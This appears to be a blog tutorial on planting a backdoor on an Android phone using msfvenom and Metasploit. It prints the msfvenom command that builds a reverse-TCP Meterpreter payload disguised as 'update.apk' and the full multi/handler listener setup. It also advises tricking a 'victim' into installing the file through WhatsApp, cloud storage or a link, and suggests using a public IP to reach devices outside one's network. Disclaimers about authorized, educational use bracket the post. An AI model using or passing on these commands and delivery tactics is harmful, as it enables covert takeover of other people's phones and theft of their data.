“Hi, thank you for reading and showing interest in my article on creating your own backdoor on Android devices. Before you continue any further please read the disclaimer below. Enjoy reading, thank you.
Disclaimer: This article is for training & educational purpose only!! Never do any unauthorized hacking or plant backdoors on devices you don’t own. I’m not responsible for any actions! “
For this article I am using a Oppo A15.
Oppo also known as “Guangdong OPPO Mobile Telecommunications Corp., Ltd” It’s one of Chinese leading telecommunication companies on the consumer market. In this article I’m using MetaSploit Framework to get a “basic” hack on Android devices.
Login on your “hack VM”. Never use your own instance for these type of purposes. I’m using a Kali-VM for this training & educational purpose. After the VM is booted the first step is I need to create a reverse TCP shell for Android. We need to do this as the malware I am creating is to create the backdoor on Android devices. From there I can go to the next step.
To create this reverse shell I’m using msfvenom.
From your terminal (I’m using Terminator) but you can use any terminal you desire I’m entering the following input:
“msfvenom -p android/meterpreter/reverse_tcp LHOST=xx.xx.xx.xx LPORT=4444 R > ../update.apk”
The LHOST (local host) IP I’m entering my local IP from my Kali box. To read this just type ifconfig in the terminal or type “ip a”. You can even use your public IP. If you use your public IP it will allow you to hack any Android device out side your network. As this is for education & training purpose only we just use our Kali VM (local) IP. (If you do wish to use your public IP please bare in mind that your host machine should have port forwarding enabled on your router). The -p function means payload.
After I succesfully created the payload I’m booting up the metasploit framework.
I’m doing that by entering: “msfconsole” in the terminal. Now we need to look for an exploit to use.
The multi/handler exploit is the right one to choose for this purpose. Why? Well the multi/handler exploit is an exploit can be used for attacking multiple hosts, is compatible with many payloads and it can also work as a listner. In fact, I’m using the multi/handler exploit quite a lot when I’m playing CTF’s or do machines on Hack the Box. You can enable the multi/handler exploit by entering the following in metasploit: “use exploit/multi/handler”
Again why I am using the multi/handler exploit is because I wish to hack an Android device inside my network. I need to plant a backdoor on the Android device in order to take control over the device.
Now we have selected our “Cyber weapon” but like every weapon it needs ammunition.
So I need to load it with the payload I created in step 1. I do this by the following:
“set payload android/meterpreter/reverse_tcp”
Now the importants parts are done. The only thing left to do is I need to set the host address. This is the attacker (address). I’m entering here the IP from the VM I am attacking from. In this case it’s my kali box.
“set LHOST 10.10.14.14” after I have entered the attacker’s IP. I only need to specify the port I wish to run the attack through. In step 1 I am using port 4444. So I need to set that in this part too. I do that by entering the following: “set LPORT 4444”
From this moment we have loaded our ammunition in our “Cyber weapon” and we are ready to fire it!
Now I need to run the exploit I have created. In short: first I have created a payload (via msfvenom) then I am loading that payload in the exploit (metasploit). The only last thing that I need to do is run (fire) it!
You can do this by entering “run” or type “exploit”.
In step 6 I am connecting to the device. Once I have a succesful reverse TCP shell. I need to install the backdoor which I created in step 1. There are a variety of options to send this update to the device for example like dropbox, Google drive, WhatsApp or simply send the victim a link to download the backdoor. After the victem installs the backdoor you will see in your (metasploit) reverse TCP handler a session. (shell)
Once the command mentions meterpreter you can type “ls” (list) to show the contents of the device.
As you see, it was a walk in the park for me.
BONUS / Step 8:
Below are some options to play with once you have succesfully taken over the Android device you targeted. Try some of these commands yourself:
This concludes my write-up on how to create your own backdoor on Android devices. I hope you find this article usefull. Please remember I have an active Discord channel (Area72). If you stuck or you need help let me know. Remember, don’t cheat. Don’t hack without permission and never access not owned or unauthorized devices. I’m not responsible for your actions! Until next time, keep paving your path to perfection. Enjoy browsing! If you do like these updates. Please consider making a small donation to keep the site up and running.